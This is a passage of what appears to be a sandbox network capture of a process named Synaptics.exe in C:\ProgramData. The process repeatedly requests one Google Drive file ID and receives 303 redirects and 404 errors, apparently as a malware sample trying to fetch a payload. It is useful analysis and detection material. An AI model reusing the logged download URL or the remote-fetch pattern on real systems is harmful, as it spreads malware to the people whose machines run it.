                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-8DOjmYVhuFn28vsH5lqgJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                29 | 192.168.2.7 | 49787 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:18 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC74tOTfK3xh63szB0FWh97khp52veaamqBE0N4LV0JFJJivhcSA3O42nM1R4Z3EHPvm0McxCUs
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-B_-sPSOJbDgfwMC_Xg7Ykg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:18 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:18 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="IVwE5Zkzu3DwBxDj8f3lfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:18 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                30 | 192.168.2.7 | 49790 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:18 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5Ul7kuMC_3LQEKEYdaFNC8_j61Um0ubERqr313NXVfL5grqy6G-eWArcBr_zElQi5S
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jQzkyXDDxxo1_sDqOABQdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:18 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:18 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="knSw49zEMs1GzAmy3KLpTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:18 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                31 | 192.168.2.7 | 49799 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6IZqHYg4RDWh64vjGbCLCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                32 | 192.168.2.7 | 49800 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EofcD4wpXyykzB9zjHvfwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                33 | 192.168.2.7 | 49801 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:19 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6s_dRA2fLEE3QSoe1pongHReCpGlnZnEdP9A89uQ9xOza9id05mzBFWhzUHs8qZXFr
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Y6PVv7T7qoZVk8Qvg8JQ-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:19 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:19 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="-PgVYl-vIzi7xood3_1inQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:19 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                34 | 192.168.2.7 | 49802 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:19 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5N7Baauisth124WrNKUVfTFxwn2nSKb6mzl_piLSobAHqe5vTy0WUT_FOzCk3iBpr5
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HcGWl0t4NIr10LZFH2yJ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:19 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:19 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="JLMTxSOcJNDX_Yii_L5lmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:19 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                35 | 192.168.2.7 | 49809 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:20 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                36 | 192.168.2.7 | 49808 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:20 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                37 | 192.168.2.7 | 49811 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                38 | 192.168.2.7 | 49814 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                39 | 192.168.2.7 | 49821 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:21 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7XyloHLZgvywUspxq-9Y5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                40 | 192.168.2.7 | 49820 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:21 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-miV8Av01WmPiCtx6T8uk5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                41 | 192.168.2.7 | 59820 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:22 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
